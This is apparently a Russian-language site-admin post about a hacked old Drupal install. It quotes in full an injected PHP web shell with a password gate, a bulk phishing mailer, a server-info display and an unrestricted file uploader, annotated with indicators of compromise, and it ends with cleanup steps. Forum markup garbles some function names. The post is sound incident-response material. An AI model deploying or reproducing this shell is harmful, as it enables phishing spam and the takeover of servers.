На каком-либо старом ядре Drupal хакер может сделать себя администратором и добавить содержимое с кодом в новость на главной странице (такой код выполняется на сервере, только если для новости выбран формат ввода, разрешающий PHP).
Код такой:
// Access gate of the injected script: everything after this section is only
// reached once the visitor has posted the hard-coded password below.
// NOTE(review): the [user=...]...[/user] wrappers around function names look like
// forum markup added when the code was pasted; they are not valid PHP as shown.
[user=session_start]session_start[/user]();
// Lifts PHP's execution time limit so a long run is not interrupted.
[user=set_time_limit]set_time_limit[/user](0);
// $v and $t are never assigned in the visible code; presumably an early-exit
// switch set by something outside this listing -- cannot tell from here.
if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){
die('');
}
$create_password = true;
// Hard-coded shared secret. For cleanup it doubles as a search string when
// looking for other copies of this script in node bodies or files on disk.
$password = "oussama";
$pass=$_POST['pass'];
// Loose comparison; on a match the password itself is stored in the session
// under 'nst' and serves as the "unlocked" marker for later requests.
if($pass==$password){
$_SESSION['nst']="$pass";
}
if($create_password==true){
// Visitors without the session marker get only the small password form and
// the request ends in die(). When this code runs inside a page body, nothing
// after it is rendered -- presumably the reason the front page looks "blocked".
// The "Locked By ..." title text is another fixed string to search for.
if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
die("
<noembed><xmp><body></xmp></noembed><noembed><xmp></body></html></xmp></noembed><title>Locked By Xsam_XAdoo </title><center><body background=white<table width=1 bgcolor=white><tr><td><font size=1 face=verdana><center><b></font></a><br></b></center><form method=post><font size=1 face=verdana color=808080><strong><center>LockeD By Sam!Adoo<br>pass pls:</center></strong><br><input type=password name=pass size=10></form>
</td></tr></table>
");}
}
// Bulk-mail section: runs only when the hidden form field 'veio' was posted.
$testa = $_POST['veio'];
if($testa != "") {
// Every mail parameter is taken directly from the POST body with no
// validation. $nome and $de are read but not used anywhere in the visible code.
$message = $_POST['html'];
$subject = $_POST['assunto'];
$nome = $_POST['nome'];
$de = $_POST['de'];
$to = $_POST['emails'];
// One recipient per line of the posted list.
$email = explode("\n", $to);
$message = stripslashes($message);
$i = 0;
$count = 1;
// Loop ends at the first empty entry or when the index runs past the list.
while($email[$i]) {
$ok = "ok";
// Headers are rebuilt for each recipient with fixed values: the X-Mailer
// string and the constant Content-Length do not depend on the message, so
// they can serve as indicators when searching mail logs or queued mail.
// The From header is set to the recipient's own address.
$headers = "MIME-Version: 1.0\n";
$headers .= "Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit
X-Mailer: EDMAIL R6.00.02
Content-Length: 41061\n";
$headers .= "From: ".$email[$i]."\r\n";
// One mail() call per recipient; the result is echoed back to the operator.
if(mail($email[$i], $subject, $message, $headers))
echo "<font color=gren>* Nъmero: $count <b>".$email[$i]."</b> <font color=gren>Sent....!</font><br><hr>";
else
echo "<font color=red>* Nъmero: $count <b>".$email[$i]."</b> <font color=red>Error in Sending ??</font><br><hr>";
$i++;
$count++;
}
$count--;
// $ok is only set inside the loop; the branch below prints an empty string.
if($ok == "ok")
echo "";
}
?>
<!-- Operator-facing page shown after the password gate. The title text below
     is a fixed string that can be searched for in stored content and files. -->
<html>
<head>
<title> XMG Priv8 Mailer</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>
body {
margin-left: 0;
margin-right: 0;
margin-top: 0;
background-color: #000000;
margin-bottom: 0;
}
.titulo {
font-family: Arial, Helvetica, sans-serif;
font-size: 70px;
color: #1BF51F;
font-weight: bold;
}
.normal {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
color: #1BF51F;
}
.form {
font-family: Arial, Helvetica, sans-serif;
font-size: 10px;
color: #FFFFFF;
background-color: #000000;
border: 1px dashed #666666;
}
.texto {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
}
.alerta {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight: bold;
color: #990000;
font-size: 10px;
}
</style>
</head>
<body>
<!-- The form posts back to the same URL (empty action). The hidden field
     'veio' is what the PHP mail section checks before sending; 'assunto',
     'html' and 'emails' supply the subject, body and recipient list. -->
<form action="" method="post" enctype="multipart/form-data" name="form1">
<input type="hidden" name="veio" value="sim">
<tr>
<table border="0" width="53%" bordercolorlight="#000000" bordercolordark="#000000" style="border: 1px ridge #1BF51F" bgcolor="black" >
<td width="462" height="25" align="center" bgcolor="#000000"><span class="titulo">Sam!Adoo</span></td>
<tr align="left">
<td colspan="2" ><font color="#1BF51F">
<!-- Host information disclosure: prints the uname string, OS, server IP,
     server software, admin mail address and the safe_mode setting. -->
Server Name: <?php echo $UNAME = [user=php_uname]php_uname[/user](); ?><br>
System: <?php echo $OS = [user=PHP_OS]PHP_OS[/user]; ?><br>
Server IP: <?php echo $_SERVER['SERVER_ADDR']; ?><br>
Software : <?php echo $_SERVER['SERVER_SOFTWARE']; ?><br>
Admin Mail: <?php echo $_SERVER['SERVER_ADMIN']; ?> <br>
Safe Mode: <?php echo $safe_mode = [user=ini_get]ini_get[/user]('safe_mode'); ?>
</td>
</center>
</tr>
<tr>
<td height="194" valign="top" bgcolor="#000000">
<table width="100%" border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
<tr>
<td align="right" height="17"><span class="texto">Subject:</span></td>
<!-- The pre-filled subject is a login lure; it is a usable keyword when
     reviewing outbound mail that was sent while the site was compromised. -->
<td height="17"><input name="assunto" type="text" value="Please Login To Read This Email "class="form" id="assunto" style="width:100%" ></td>
</tr>
<tr align="center" bgcolor="#99CCFF">
<td height="20" colspan="2" bgcolor="#000000"><span class="texto">Gatorsé Mailer</span></td>
</tr>
<tr align="right">
<td height="146" colspan="2" valign="top"><br>
<textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html">
</textarea>
<span class="alerta">*Reminder: Text HTML</span></td>
</tr>
<tr align="center" bgcolor="#000000">
<td height="10" colspan="2"><span class="texto">Mailing List</span>
</tr>
<tr align="right">
<td height="136" colspan="2" valign="top"><br>
<textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails">
</textarea>
<span class="alerta">* Mail List</span> </td>
</tr>
<tr>
<!-- This button is named 'Submit', the same field name the upload section
     later in the script tests with isset(). -->
<td height="26" align="right" valign="top" colspan="2"><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="15" align="center" bgcolor="#000000"> </td>
</tr>
</table>
</form>
</body>
<?php
// File-upload section of the injected script. For incident response this is
// the part that can leave extra files on disk after the news item is deleted.
echo '<center><font color="Red" size="4">';
/// Script Upload By Thex@b1 \\\
// Entered on any POST that carries a 'Submit' field. The mailer form's button
// uses the same name, so that form also lands here, but without an 'image'
// file part the inner isset() is false and nothing is moved.
if(isset($_POST['Submit'])){
// Empty target directory: the destination path is just the file name, so it
// is resolved relative to the current working directory of the script.
$filedir = "";
// $maxfile is declared but never checked in the visible code.
$maxfile = '2000000';
$mode = '0644';
// The client-supplied file name is used as-is; no extension, type or path
// check is performed before the file is stored.
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx = $filedir.$userfile_name;
// Errors from the move are suppressed with @ and its result is ignored, so
// "Done" is printed whether or not the file was actually written.
@move_uploaded_file($userfile_tmp, $qx);
[user=chmod]chmod[/user] ($qx, octdec($mode));
echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
// No 'Submit' posted: show the upload form (file field named 'image').
echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
}
echo '</center></font>';
?>
Результат: блокирование главной страницы — вместо неё выводится форма запроса пароля, потому что код обрывает вывод страницы вызовом die().
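Решение: зайти на сайт не через главную страницу, например через http://www.site.ru/user, залогиниться и удалить новость — после этого главная страница заработает. Затем обновить ядро Drupal, чтобы подобное не повторилось.
И удалить посторонних администраторов из списка «Пользователи». Поскольку в коде есть загрузчик файлов и рассыльщик почты, стоит также проверить каталог сайта на посторонние файлы, сменить пароли оставшихся администраторов и просмотреть почтовую очередь и логи сервера.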
Вложение | Размер |
---|---|
![]() | 37.07 КБ |
Комментарии
Очень ценная информация.